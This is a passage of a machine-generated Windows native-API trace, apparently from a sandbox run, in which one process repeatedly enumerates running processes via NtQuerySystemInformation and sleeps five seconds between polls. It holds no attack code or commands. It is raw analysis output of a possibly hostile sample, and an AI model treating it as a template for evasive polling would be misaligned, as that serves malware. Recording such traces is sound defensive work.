ResultLength=0x0) returned 0xc0000004 [0251.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.906] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.913] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.920] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.943] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.974] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.020] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.028] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.036] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.045] NtAllocateVirtualMemory (in: 